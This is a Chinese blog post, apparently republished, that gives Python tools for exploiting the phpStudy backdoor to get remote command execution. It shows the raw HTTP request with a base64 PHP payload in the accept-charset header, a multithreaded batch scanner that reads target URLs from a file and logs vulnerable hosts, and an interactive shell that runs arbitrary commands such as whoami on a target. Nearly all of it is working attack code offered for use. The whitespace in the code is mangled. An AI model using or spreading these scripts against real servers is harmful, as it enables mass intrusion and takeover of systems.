phpstudy后门rce批量利用脚本的实现
写两个一个批量检测的一个交互式shell的
暂时py图形化的qt写出来..有点问题
后门包:
GET/HTTP/1.1
Host:127.0.0.1
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:55.0)Gecko/20100101Firefox/55.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection:close
accept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding:gzip,deflate
Upgrade-Insecure-Requests:1
执行那段写shell即可
晚上抽点空简单写个发包的py:
#!/usr/bin/envpython3 #-*-encoding:utf-8-*- #卿博客:https://www.cnblogs.com/-qing-/ importbase64 importrequests importthreading importqueue print("======PhpstudyBackdoorExploit============\n") print("===========ByQing=================\n") print("=====Blog:https://www.cnblogs.com/-qing-/==\n") payload="echo\"qing\";" payload=base64.b64encode(payload.encode('utf-8')) payload=str(payload,'utf-8') headers={ 'Upgrade-Insecure-Requests':'1', 'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Accept-Language':'zh-CN,zh;q=0.9', 'accept-charset':payload, 'Accept-Encoding':'gzip,deflate', 'Connection':'close', } defwrite_shell(url,headers): try: r=requests.get(url=url+'/index.php',headers=headers,verify=False,timeout=30) if"qing"inr.text: print('[+]BackDoorsuccessful:'+url+'===============[+]\n') withopen('success.txt','a')asf: f.write(url+'\n') else: print('[-]BackDoorfailed:'+url+'[-]\n') except: print('[-]Timeout:'+url+'[-]\n') url="http://xxx" write_shell(url=url,headers=headers)
界面优化、改下多线程、批量读取文本文件后的代码:
#!/usr/bin/envpython3 #-*-encoding:utf-8-*- #卿博客:https://www.cnblogs.com/-qing-/ importbase64 importrequests importthreading importthreadpool print("======PhpstudyBackdoorExploit============\n") print("===========ByQing=================\n") print("=====Blog:https://www.cnblogs.com/-qing-/==\n") defwrite_shell(url): payload="echo\"qing\";" payload=base64.b64encode(payload.encode('utf-8')) payload=str(payload,'utf-8') headers={ 'Upgrade-Insecure-Requests':'1', 'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Accept-Language':'zh-CN,zh;q=0.9', 'accept-charset':payload, 'Accept-Encoding':'gzip,deflate', 'Connection':'close', } try: r=requests.get(url=url+'/index.php',headers=headers,verify=False,timeout=30) if"qing"inr.text: print('[+]BackDoorsuccessful:'+url+'===============[+]\n') withopen('success.txt','a')asf: f.write(url+'\n') else: print('[-]BackDoorfailed:'+url+'[-]\n') except: print('[-]Timeout:'+url+'[-]\n') #url="http://xxx" #write_shell(url=url,headers=headers) defmain(): withopen('url.txt','r')asf: lines=f.read().splitlines() task_pool=threadpool.ThreadPool(5) requests=threadpool.makeRequests(write_shell,lines) forreqinrequests: task_pool.putRequest(req) task_pool.wait() if__name__=='__main__': main() #线程队列部分 #th=[] #th_num=10 #forxinrange(th_num): #t=threading.Thread(target=write_shell) #th.append(t) #forxinrange(th_num): #th[x].start() #forxinrange(th_num): #th[x].join()
你也可以加上读取php文件的字典这个简单没啥说的
下一个是交互式shell
#!/usr/bin/envpython3 #-*-encoding:utf-8-*- #卿博客:https://www.cnblogs.com/-qing-/ importbase64 importrequests importthreading importthreadpool importre print("======PhpstudyBackdoorExploit---os-shell============\n") print("===========ByQing=================\n") print("=====Blog:https://www.cnblogs.com/-qing-/==\n") defos_shell(url,headers,payload): try: r=requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10) #print(r.text) res=re.findall("qing(.*?)qing",r.text,re.S) print("[+]===========TheResponse:==========[+]\n") res="".join(res) print(res) except: print("[-]===========Failed!Timeout...==========[-]\n") defmain(): url=input("inputtheUrl,example:\"http://127.0.0.1/\"\n") payload=input("inputthepayload,default:echosystem(\"whoami\");\n") de_payload="echo\"qing\";system(\"whoami\");echo\"qing\";" ifpayload.strip()=='': payload=de_payload payload="echo\"qing\";"+payload+"echo\"qing\";" payload=base64.b64encode(payload.encode('utf-8')) payload=str(payload,'utf-8') headers={ 'Upgrade-Insecure-Requests':'1', 'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Accept-Language':'zh-CN,zh;q=0.9', 'accept-charset':payload, 'Accept-Encoding':'gzip,deflate', 'Connection':'close', } os_shell(url=url,headers=headers,payload=payload) if__name__=='__main__': main()
声明:本文内容来源于网络,版权归原作者所有,内容由互联网用户自发贡献自行上传,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任。如果您发现有涉嫌版权的内容,欢迎发送邮件至:czq8825#qq.com(发邮件时,请将#更换为@)进行举报,并提供相关证据,一经查实,本站将立刻删除涉嫌侵权内容。